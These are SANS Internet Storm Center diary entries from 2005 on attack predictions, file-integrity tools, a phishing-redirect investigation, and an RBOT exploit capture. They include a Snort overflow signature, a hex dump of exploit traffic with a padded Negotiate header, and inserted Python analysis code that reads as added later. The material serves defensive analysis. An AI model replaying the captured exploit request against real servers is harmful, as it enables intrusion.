Chip has a fatalistic outlook, telling us that, "Aside from 'individual' system administrator and 'real' security consultants, I see no cluefulness at all in the IT world, nor in oversight agencies, none." He goes on to say that, "the folks who have been wishing for a really stable platform such as BSD to host malicious applications on, have been handed a goldmine in the form of the new MacIntel platform."

Phil predicts "a worm that actually exploits a vulnerability for which we haven't had a patch for months or even years. It's been a while..."

Well, this is interesting. Most of today's submissions have been oriented on technologies. This afternoon we've seen quite a shift in the thinking of the evil minds. Here's what the mailbag brought us...

An anonymous person looked into the future connected world and prognosticated, "what about crackers breaking into an automated household and manipulating all sorts of automated devices, like the fridge, locks, dishwashers, coffeemakers and so on ... another one could be break-ins to car computers to ground you or worse cause an accident on purpose ... and still another one could be (or maybe already is...) hijacking devices (such as sealing harddisks with passwords and then asking for money to reopen the disk) - you could do this with all sorts of networked equipment ... a completely different approach is identity manipulation: changing information on the web about other people to create a wrong impression about them...."

AJ steps up the heat with, "I think that the next attack could be a mobile virus that spreads between smart mobile phones. At a designated time the payload could have all the mobile phones dial a specified number DDOSing the cellular network and the target phone network."

Jim was thinking out of the box when he wrote, "Funny you haven't mentioned terrorism yet. Why blow up a building when you can destroy a nation's economy?"

Not to be outdone, Rick fired away with, "Nations or groups dedicated to the downfall of any given government could be compiling botnet lists and lists of the most effective malware for a coordinated distributed attack to undermine and collapse economic stability, maybe as part of other physical attacks."

Wayne believes that, "the newer threat will be online extortion. Download a malware, encrypt your important info, and ask for money.."

Mike was maintaining a positive outlook when he wrote, "For years, organizations have been spending a lot of money on poorly-implemented or half-baked security solutions so they can check a box on an audit finding. At the same time, auditors have been providing findings of such poor quality that the information is nearly useless to their customers. I believe some of the recent high-profile identity theft cases will bring this to light, and hopefully improve auditing practices and force the hand of large organizations to *properly* implement security technologies."

Mark is convinced that, "a cyberattack on our electronic infrastructure is in the cards." He thinks it could happen by creating a "Coordinated attack on a predetermined time and date launched from many platforms, including zombified PCs, social engineering attacks, and insiders that were 'planted' for D-Day; [or] Indirect attack from the EMP blast from a nuclear warhead on a missile. Could be launched from offshore somewhere, or even from inside the US, with the materials having been smuggled in and assembled on location; [or] Create a crisis of such proportions (some kind of attack) that the much-increased use of the electronic infrastructure because of everyone trying to contact family, friends, etc., crashes everything." (wow, Mark, you should be a screen writer!)

Several more ideas arrived later in the day. In case you are wondering, I'm putting nearly every submission in the diary since these are pretty good ideas. However, after this update we won't add any more.

Chris thinks that "identity theft is going to become more and more popular. There was a report recently about Social Security Numbers being used to covertly allow illegal immigrants to marry legit citizens, sometimes multiple times, and without the legit citizen even knowing! You can do a lot more to someone with their SSN than with their CC number!"

Ronald's theory is "massive insider access to sensitive data that is sold to criminal elements on the Internet. Someone inside somewhere right now smells the money they can get for information. And they are willing to sell it."

Michael has found that "virus and other malicious code will bypass some 'attachment blocking' through e-mail if the e-mail is digitally signed. So a virus writer could potentially use this vulnerability to bypass AVs. I could also see malicious code being encrypted in SSL on web pages, bypassing content scanning at the gateway or through proxys. Can't scan encrypted traffic..."

Florian asserts, "we will see a large increase of Linux "worms" propagating via vulnerable web applications like we saw with phpBB. I think what will make them different will be that they will target multiple vulnerabilities in various software packages (i.e. phpBB, awstats, etc). I'm guessing they won't be depending on Google anymore and do it libwhisker style (maybe a combo of both)."

Mark wouldn't be surprised "to see software deployed to turn [compromised computers] into a malicious distributed processing botnet... Think of an evil SETI@Home working to decrypt private data."

Jeff is "afraid of 'booby-trapped' malware/bots/etc. We have already seen many that attempt to disable or evade detection. What if the next generation 'detects' that you have found it or are attempting to disable it, and reformats your hard drive?"

Jeff (different Jeff) believes that "the attacks of the next century will focus on portable devices using MMS and Bluetooth as silent carriers until they are connected to a PC or wired network."

Vinicius wrote to say that, "I see current threats getting smarter. IRC bots replacing the irc protocol by private encrypted protocols, perhaps compatible with http, running on well known ports such as 80/tcp, 443/tcp, with a much less bloated communication, passing undetected by early warning systems and behavior pattern recognition. And all this being installed via web browsers [with] very recent vulnerabilities."

Finally, it looks like Bruce took a peek at what I wanted to do today. No, I didn't know that he posted his blog yesterday on nearly the same subject. Way to go Bruce!! : )

Marcus H. Sachs

Director, SANS Internet Storm Center

Handler of the Day

Published: 2005-06-06

Windows HIDS; Port 80, IP-hopping scan; Why old exploits are still popular; A Simple Phishing Investigation Tip

Windows HIDS

Simon wrote in to ask about available Windows HIDS systems. He currently uses AIDE and Tripwire on his Linux/Solaris boxes. Personally, I don't run HIDS on Windows boxes. I find running HIDS on a system that isn't subject to any change control to be a noisy, time-consuming process. This applies to my environment, so your mileage will vary. Of course, some may consider running an instance of Snort on each server as HIDS, and Tripwire/AIDE as file-integrity checkers. So, let's restrict our comments to Windows-based open- and closed-source file-integrity checkers. What are your favorites, other than Tripwire for Windows? (UPDATE: I'm getting a lot of comments on things other than file-integrity checkers. Now, I agree that the term HIDS is confusing, but I guess I wasn't clear. To reiterate: let's restrict our comments to Windows-based open- and closed-source file-integrity checkers. :-) )

Some of the file-integrity-style HIDS suggested by the readers are:

Dragon (which has a file-integrity option) (http://www.enterasys.com/products/ids/DSHSS-xxx/) ($$)

Osiris (http://www.hostintegrity.com/osiris/) (open-source)

Samhain and Beltane can be used if you are running Cygwin (http://la-samhna.de/samhain/HOWTO-samhain-on-windows.html)

Tripwire (http://www.tripwire.com) ($$)

Harlan likes to "roll his own" using the Perl Win32::AdvNotify module--especially for protecting "critical" files such as web pages.

For more fully-featured HIDS solutions:

eEye's Blink (http://www.eeye.com/html/products/blink/index.html) ($$)

ISS Server Sensor (http://www.iss.net/products_services/enterprise_protection/rsserver/protector_server.php) ($$)
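To show what the file-integrity checkers listed above actually do under the hood, here is an added example (my own code, not part of the diary or any of the products named): a baseline of SHA-256 digests plus size and mtime is taken over a directory tree and stored as JSON, and a later scan is diffed against it to report added, removed and modified files. The web root, file names and tampering in demo() are constructed so the script runs stand-alone in a temporary directory.

```python
import hashlib
import json
import tempfile
from pathlib import Path


def file_record(path: Path) -> dict:
    """Digest a file in chunks and record its size and mtime alongside the hash."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    st = path.stat()
    return {"sha256": h.hexdigest(), "size": st.st_size, "mtime": int(st.st_mtime)}


def scan(root: Path) -> dict:
    """Walk root and record every regular file, keyed by its POSIX-style relative path.
    Symlinks are skipped so a link swapped in for a file shows up as 'removed'."""
    records = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            records[p.relative_to(root).as_posix()] = file_record(p)
    return records


def save_baseline(records: dict, dest: Path) -> None:
    dest.write_text(json.dumps(records, indent=1, sort_keys=True))


def load_baseline(src: Path) -> dict:
    return json.loads(src.read_text())


def compare(baseline: dict, current: dict) -> dict:
    """Diff two scans. A file is 'modified' only when its digest changed; a file whose
    mtime moved but whose content is identical is listed as 'touched' so it can be
    triaged separately instead of swelling the modified list."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified, touched = [], []
    for name in sorted(set(current) & set(baseline)):
        if current[name]["sha256"] != baseline[name]["sha256"]:
            modified.append(name)
        elif current[name]["mtime"] != baseline[name]["mtime"]:
            touched.append(name)
    return {"added": added, "removed": removed, "modified": modified, "touched": touched}


def demo() -> dict:
    """Constructed scenario: baseline a small web root, change it, and re-scan."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "wwwroot"
        (root / "images").mkdir(parents=True)
        (root / "index.html").write_text("<html>welcome</html>")
        (root / "images" / "logo.gif").write_bytes(b"GIF89a" + bytes(16))
        (root / "config.inc").write_text("db_host=localhost")
        baseline_file = Path(tmp) / "baseline.json"   # in practice keep this off-host or read-only
        save_baseline(scan(root), baseline_file)

        # Simulated changes: a rewritten page, a dropped file, a deleted file.
        (root / "index.html").write_text("<html>changed</html>")
        (root / "images" / "new.txt").write_text("unexpected")
        (root / "config.inc").unlink()

        return compare(load_baseline(baseline_file), scan(root))


if __name__ == "__main__":
    for kind, names in demo().items():
        print(f"{kind:9s} {names}")
```

The baseline is the trust anchor, so it belongs somewhere the monitored host cannot rewrite it; that, plus a scheduler and a reporting channel, is most of what the commercial products add on top of this loop.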

Port 80, IP-hopping scan

One of the handlers is seeing port 80 scans hitting random IPs in his logs. Has anyone captured what they could be looking for? (i.e. from your netcats, or webserver logs.)

So far, no one has provided a correlation, but there have been plenty of reports of elevated port 80 scanning activity, and based on submitted captures these appear to be ASN.1 overflow attempts (MS04-007).

Why old exploits are still popular

The media has picked up on the Win32.Glieder.AK upgrading with Fantibag and Mitglieder event. While looking at what kind of threat the issue poses to my "day-job", I see that Symantec had signatures for Glieder.AK on March 1st, 2005. Naively one wonders, "what's the big deal? We have our signatures up to date, so we're golden." In a way, that opinion holds. But the target isn't your firm's managed servers and desktops; they're looking for the old servers in closets, or cable modem connections of uninformed users (this used to be "uniformed users"-- but some didn't like the mental polaroid that image developed :-) -Thanks Joel.) They're looking for a system that isn't maintained, so when they get control of it, they know they'll be able to control it for a long time to come. It's not a new idea that it's a protection strategy to use an older worm to get a foothold and let it sit for a while before the attacker "puts on their best warez." The idea is that by following this cautious strategy, the bad guys keep examples of their latest stuff out of the good guys' hands. Is that what we're seeing here with this evolution?

A Simple Phishing Investigation Tip

I was performing followup investigation on a recent phishing attempt against a financial firm. It was set up as a series of "bait" emails that used images linked from a compromised webserver. The "bait" email pointed the user to a redirector website. The redirector website pointed to a single "collector" site. It was a strange set-up, or it seemed that way to me; I mean, if you control a number of servers, why not use them all as collectors? Anyway, back to the investigation phase. One of the challenges in figuring it out was my concern to not use a real browser to explore the site, and my need to get the right redirect information. Simply browsing to the redirector site in lynx returned an error page. In order to get the redirector site to play along, I needed to look like a real browser, so I cobbled together this simple (and in some circles criminally-bad) Perl script to capture the collection site:

use strict;
use warnings;
use LWP 5.64;
my $url = 'http://a.b.c.d/target/';   # the redirector site under investigation
my $browser = LWP::UserAgent->new;
# present a browser-looking User-Agent so the redirector plays along
$browser->agent('Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)');
my $response = $browser->get($url);
die "Can't get $url -- ", $response->status_line unless $response->is_success;
print $response->content;

Update: my favorite flame of the evening: "The only thing worse than criminally bad perl is reinventing the wheel." Thanks Simon, who provides three options:

lynx -useragent=NAME

wget -U NAME

curl -A NAME

(reminder: I'm not Tom "follow the bouncing malware" Liston, I'm the other Liston.)
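The part of this investigation that a browser would have done silently is following the redirector to the collector. Below is an added example, my own code rather than the handler's script, that pulls redirect targets out of a single response without following them: the HTTP Location header, a meta refresh tag, and a bare location assignment in inline script, which are the three places a redirector page typically hides the next hop. fetch_hops() walks a chain one hop at a time with the spoofed User-Agent and a hop limit; it needs network access and is only there to show how the extractor is used. The redirector and collector host names and the sample page body are constructed.

```python
import re
import urllib.error
import urllib.request
from html.parser import HTMLParser
from urllib.parse import urljoin

# content="5; url=http://..." or content="0;URL='/x'"
META_REFRESH_RE = re.compile(r"^\s*\d+\s*;\s*url\s*=\s*['\"]?([^'\"\s>]+)", re.I)
# window.location = "..."; location.href = '...'; top.location = "..."
JS_LOCATION_RE = re.compile(
    r"""(?:window\.|document\.|top\.|self\.)?location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""", re.I)


class _RefreshFinder(HTMLParser):
    """Collect the url= part of every <meta http-equiv="refresh"> tag."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("http-equiv", "").lower() == "refresh":
            m = META_REFRESH_RE.match(a.get("content", ""))
            if m:
                self.targets.append(m.group(1))


def extract_targets(base_url: str, status: int, headers: dict, body: str) -> list:
    """Absolute redirect targets found in one response, in discovery order, de-duplicated."""
    found = []
    location = next((v for k, v in headers.items() if k.lower() == "location"), None)
    if 300 <= status < 400 and location:
        found.append(location)
    finder = _RefreshFinder()
    finder.feed(body)
    found.extend(finder.targets)
    found.extend(JS_LOCATION_RE.findall(body))
    seen, out = set(), []
    for t in found:
        absolute = urljoin(base_url, t.strip())
        if absolute not in seen:
            seen.add(absolute)
            out.append(absolute)
    return out


def fetch_hops(start_url: str, user_agent: str, max_hops: int = 5) -> list:
    """Record each hop of a redirect chain (network call; not exercised by the tests).
    Automatic redirect following is disabled so no hop is skipped, and the body is
    only parsed, never rendered or executed."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None   # makes urllib raise HTTPError for 3xx instead of following

    opener = urllib.request.build_opener(NoRedirect)
    chain, url = [start_url], start_url
    for _ in range(max_hops):
        req = urllib.request.Request(url, headers={"User-Agent": user_agent})
        try:
            with opener.open(req, timeout=10) as resp:
                status, hdrs = resp.status, dict(resp.headers)
                body = resp.read(200_000).decode("latin-1")
        except urllib.error.HTTPError as e:
            status, hdrs, body = e.code, dict(e.headers), e.read(200_000).decode("latin-1")
        targets = extract_targets(url, status, hdrs, body)
        if not targets:
            break
        url = targets[0]
        chain.append(url)
    return chain


# Constructed fixture: a redirector page that uses both a meta refresh and a script hop.
SAMPLE_URL = "http://redirector.example/r/"
SAMPLE_BODY = (
    '<html><head><meta http-equiv="refresh" content="0; url=/go?to=collector"></head>'
    '<body><script>window.location = "http://collector.example/login.php";</script></body></html>'
)

if __name__ == "__main__":
    for t in extract_targets(SAMPLE_URL, 200, {"Content-Type": "text/html"}, SAMPLE_BODY):
        print("next hop:", t)
```

The same User-Agent string the Perl script uses goes into fetch_hops(); the difference is that every intermediate URL is kept, which is the evidence you want when reporting the chain to the hosting providers.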


Kevin Liston

Volunteer Incident Handler

kliston that.at.thingy. isc.sans.org


Published: 2005-06-05

Sunday P & Q; Happy Birthday OpenSSH; RBOT Snort Sig; Bacula

The Peace and Quiet of a Sunday Afternoon, OpenSSH is a toddler, an RBOT Snort Signature submitted by one of our readers, and a plug for a very useful open source project...

Sunday Shifts are Great

It has been a quiet weekend so far, so here's a few things to entertain your brain:

Reading Materials--

Dogs of War: Securing Microsoft Groupware Environments with Unix (Parts 1&2)

Port Knocking: Beyond the Basics (from the SANS Reading Room, by Dawn Isabel)

Eye Candy...really some simply amazing photography-- http://gilad.deviantart.com/gallery/

Interesting Sites I Stumbled On--


Happy Birthday OpenSSH

As posted to Slashdot...OpenSSH turns 5 today. It's just a toddler, but an important tool in every security professional's bag. Cake and ice cream for everyone!!!


Useful Software Plug

I've been going through some hassles with our tape back system at work, and came upon an open source project called Bacula. It's great--has a lot in common with Amanda and Veritas. It takes a little getting used to, but it really is fantastic. It overcomes some of the shortcomings of Amanda (like being able to span volumes) and costs a lot less (as in nothing) than Veritas. I was really impressed and feel it's plug worthy.

You're all doing some kind of backups, no? ;) If not, check out Bacula. Even if you are, check out Bacula!


RBOT Snort Sig

Correction: Shirkdog wrote in that he has observed RBOT triggering this existing Snort community signature (the rule header below is reconstructed from the alert output that follows; the diary carried only the rule body):

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"COMMUNITY WEB-MISC mod_jrun overflow attempt"; flow:to_server,established; content:"|3A|";
pcre:"/^.*\x3a[^\n]{1000}/sm"; reference:bugtraq,11245; reference:cve,2004-0646;
classtype:web-application-attack; sid:100000122; rev:1;)

[**] [1:100000122:1] COMMUNITY WEB-MISC mod_jrun overflow attempt [**]
[Classification: Web Application Attack] [Priority: 1]
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2004-0646]
[Xref => http://www.securityfocus.com/bid/11245]
Event ID: 6 Event Reference: 6
06/05/05-06:49:21.665909 -> x.x.x.x:80
TCP TTL:110 TOS:0x20 ID:64107 IpLen:20 DgmLen:1492 DF
***A**** Seq: 0x202A8FC Ack: 0x584837AA Win: 0xFF3C TcpLen: 20
47 45 54 20 2F 20 48 54 54 50 2F 31 2E 30 0D 0A GET / HTTP/1.0..
48 6F 73 74 3A 20 XX XX 2E XX XX XX 2E XX XX XX Host: XX.XXX.XXX
2E XX XX XX 0D 0A 41 75 74 68 6F 72 69 7A 61 74 .XXX..Authorizat
69 6F 6E 3A 20 4E 65 67 6F 74 69 61 74 65 20 59 ion: Negotiate Y
49 49 51 65 67 59 47 4B 77 59 42 42 51 55 43 6F IIQegYGKwYBBQUCo
49 49 51 62 6A 43 43 45 47 71 68 67 68 42 6D 49 IIQbjCCEGqhghBmI
34 49 51 59 67 4F 43 42 41 45 41 51 55 46 42 51 4IQYgOCBAEAQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQUFBQ
55 46 42 51 55 46 42 51 55 46 42 51 UFBQUFBQUFBQ


Dave Brookshire

SANS Handler-on-Duty


Published: 2005-06-03

Genuine TCP Port 0 activity; Osama was not caught, but some Windows users were; New RBOT variants using SQL & IIS

Genuine port 0 activity

Usually, when someone posts a message about "port 0" traffic or alerts, it is little more than an artifact of some monitoring device's inability to correctly report fragments. Not this time, and I'm still scratching my head over it.

I run several different loggers, parsers, etc. on my networks, and since I love to give the bad guys every opportunity to feel good about themselves, I throw a few honeypots in there for good measure. Better chances to succeed and give me better insight into their intentions, and all that. One of the tricks I use is to redirect everything, all unused ports, all unused addresses, etc., into a set of Perl scripts that I call Tiny Honeypot (thp). As lame as it is, the results are sometimes rather surprising. Take this one, for example:

0000000: e34c 0000 0001 105e 47e3 01cf 0e98 0d1d ãL.....^Gã.Ï....
0000010: ac6f 0055 b36f 0bd5 ba2f 5436 1204 0000 .o.U.o.Õº/T6....
0000020: 0002 0100 0107 0065 5365 7276 6572 0301 .......eServer..
0000030: 0011 3c00 0000 0301 00fb 00ef 0600 0201 ..<......û.ï....
0000040: 0055 0700 6573 6572 7665 7200 0000 0000 .U..eserver.....
0000050: 00 .

That was the payload delivered, not once, but 24 times (with slight variation) in a one hour period from seven different hosts, scattered across the globe. What's really interesting is that they were all looking for a "service" listening on port 0. Either that or they're looking for me and my silly Perl scripts. Of course I don't have a listener on port 0, but thp uses the netfilter "REDIRECT" target to DNAT everything, including traffic to absurd ports, to the location of the thp responders.
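The first pass over an unknown payload like the one above is to get it back from the dump into bytes and look at the printable runs. Here is an added example doing that (my code, not part of the diary or the thp scripts): a parser for xxd-style dump lines that checks the offsets are contiguous and ignores the ASCII column, followed by a strings(1)-style extractor. The fixture is the diary's own dump, re-typed as a constant.

```python
import re
import string

# The thp capture shown in the diary, re-typed here as a fixture.
THP_DUMP = """\
0000000: e34c 0000 0001 105e 47e3 01cf 0e98 0d1d ãL.....^Gã.Ï....
0000010: ac6f 0055 b36f 0bd5 ba2f 5436 1204 0000 .o.U.o.Õº/T6....
0000020: 0002 0100 0107 0065 5365 7276 6572 0301 .......eServer..
0000030: 0011 3c00 0000 0301 00fb 00ef 0600 0201 ..<......û.ï....
0000040: 0055 0700 6573 6572 7665 7200 0000 0000 .U..eserver.....
0000050: 00 .
"""

# offset, colon, then at most eight groups of hex digits; capping at eight keeps an
# ASCII column that happens to start with hex-looking characters from being absorbed.
XXD_LINE = re.compile(r"^([0-9a-fA-F]+):((?:\s+[0-9a-fA-F]{2,4}){1,8})")


def parse_xxd(dump: str) -> bytes:
    """Rebuild the bytes of an xxd -g2 style dump; raises if offsets do not line up."""
    out = bytearray()
    expected = 0
    for line in dump.splitlines():
        m = XXD_LINE.match(line)
        if not m:
            continue
        offset = int(m.group(1), 16)
        if offset != expected:
            raise ValueError(f"offset gap at 0x{offset:x}: expected 0x{expected:x}")
        chunk = bytes.fromhex("".join(m.group(2).split()))
        out += chunk
        expected = offset + len(chunk)
    return bytes(out)


def printable_runs(data: bytes, min_len: int = 4) -> list:
    """Runs of printable ASCII (space included, control characters excluded) of at
    least min_len bytes, in the order they appear."""
    printable = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")
    runs, cur = [], bytearray()
    for b in data + b"\x00":          # the trailing NUL flushes the last run
        if b in printable:
            cur.append(b)
        else:
            if len(cur) >= min_len:
                runs.append(cur.decode("ascii"))
            cur = bytearray()
    return runs


if __name__ == "__main__":
    payload = parse_xxd(THP_DUMP)
    print(f"{len(payload)} bytes; strings: {printable_runs(payload)}")
```

On this payload the only strings of four or more characters are the two "eServer"/"eserver" tokens the ASCII column already hinted at, which is consistent with the diary's guess that the senders expected some specific service to answer.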

Why port 0? A couple of possibilities:

1. Broken tool - all too often I've beat my head against the wall trying to figger out why I see weird traffic and it turns out to be a "misfire"

2. Probe - Looking for hosts, routers, firewalls, etc. The prober doesn't care about a tcp service's response, often it is the ICMP (or other) messages that are most valuable.

3. Looking for a broken service - Maybe, just maybe, there is a legitimate service, with an undisclosed vuln, that accidentally listens on port 0 as well as its intended port. I'm leaning towards this, because of the payload that was delivered AFTER a successful three-way handshake. Hmmmmm.

I'm going to hold off for a bit on posting the source addresses, until I can get a response from their admins. Although it happened a few days ago, I haven't been able to locate any other similar activity on any of the networks I monitor.

While a few attack tools will use "0" as the source port by default, this was directed to destination port 0. Do me a favor: if anyone has seen legitimate TCP destination port 0 activity, could you please send us as much detail as possible? I saw it in the wee hours of June 1.

Osama is still at large, and delivering malware to a PC near you

As I'm certain many of you have seen or read by now, attackers actually prey on users' curiosity and gullibility. No, really, they do! The recent "Osama Bin Laden has been captured" emails direct the recipients to....you guessed it, open a zip file containing a downloader. This beastie then pulls down what Norton calls "Backdoor.Nibu.D", a keylogger/bank info scarfer/clipboard sniffer/all-around bad guy.

Update A/V, don't open email attachments you aren't expecting, don't believe everything you read, get plenty of sleep, floss. If you absolutely, positively must see what this thing looks like, .

RBOT variants getting even MORE talented

Thanks to Robert Tabin for alerting us to new RBOT propagation methods - now they incorporate a MSSQL buffer overflow (MS02-061) exploit in the growing cocktail. See
